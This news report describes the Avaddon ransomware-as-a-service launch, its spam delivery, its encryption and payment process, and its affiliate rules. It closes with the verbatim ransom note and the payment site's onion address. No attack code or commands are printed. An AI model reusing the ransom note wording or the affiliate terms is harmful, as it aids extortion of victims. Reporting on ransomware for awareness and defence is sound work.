With a wink and a smile, the new Avaddon Ransomware has come alive in a massive spam campaign targeting users worldwide.
Avaddon was launched at the beginning of this month and is actively recruiting hackers and malware distributors to spread the ransomware by any means possible.
As its first known attack, the Avaddon Ransomware is being distributed in a spam campaign reminiscent of February's Nemty Ransomware Love Letter campaign.
In a related report shared with BleepingComputer, the cybersecurity firm Appriver stated that the Phorphiex/Trik Botnet is distributing the malicious emails.
This campaign is not small, as AppRiver security researcher David Picket told us that they had blocked over 300,000 emails in just a short period.
That means to the recipient, it would just appear as a .jpg file, as shown below.
When executed, the JS attachment will launch both a PowerShell and Bitsadmin command to download the Avaddon ransomware executable to the %Temp% folder and run it.
In the sample tested by BleepingComputer, once executed, the ransomware will search for data to encrypt and append the .avdn extension to encrypted files.
In each folder, a ransom note named [id]-readme.html will also be created. This ransom note contains a link to the TOR payment site and a unique victim ID used to login to the site.
This TOR payment site includes the ransom amount, which in our cause was $900, and instructions on how to pay for a decryptor.
Other sections of the TOR site include a support chat, free test decryption, and a help page illustrated by Harry Potter characters.
Unfortunately, ID-Ransomware creator Michael Gillespie has analyzed the ransomware and stated that it is secure and cannot be decrypted for free.
In advertisements posted to Russian-speaking hacker forums at the beginning of the month, Avaddon has stated that they are a new Ransomware-as-an-Affiliate (RaaS) program.
A RaaS program is when the ransomware creator is responsible for the development of the malware and the operation of the TOR payment site.
Affiliates who join the program are responsible for distributing the ransomware via spam, compromising networks, and exploit kits.
As part of this arrangement, Avaddon is paying affiliates 65% of any ransom payments they bring in, and the Avaddon operators will receive 35%. Larger affiliates are commonly able to negotiate a higher revenue share depending on the size of their attacks.
As is typical with RaaS programs, Avaddon has a series of rules that affiliates must follow when distributing the ransomware. The most common rule is that they cannot target victims in the Commonwealth of Independent States (CIS).
It is forbidden to work in the CIS countries (AZ, AM, BY, KZ, KG, MD, RU, TJ, UZ, UA, GE , TM)
It is forbidden to indicate or pass on to third parties the address of the admin panel on the .onion network.
It is forbidden to upload .exe to unverified scanners that merge AV labs.
Now that the Avaddon creators have started accepting applications, we should expect to see distribution increase and more advanced attacks to occur.
Your network has been infected by Avaddon
All your documents, photos, databases and other important files have been encrypted and you are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software - Avaddon General Decryptor. Only we can give you this software and only we can restore your files! You can get more information on our page, which is located in a Tor hidden network. How to get to our page
Download Tor browser - https://www.torproject.org/
Install Tor browser
Open link in Tor browser - avaddonbotrxmuyl.onion Follow the instructions on this page Your ID:
XXX DO NOT TRY TO RECOVER FILES YOURSELF! DO NOT MODIFY ENCRYPTED FILES! OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER!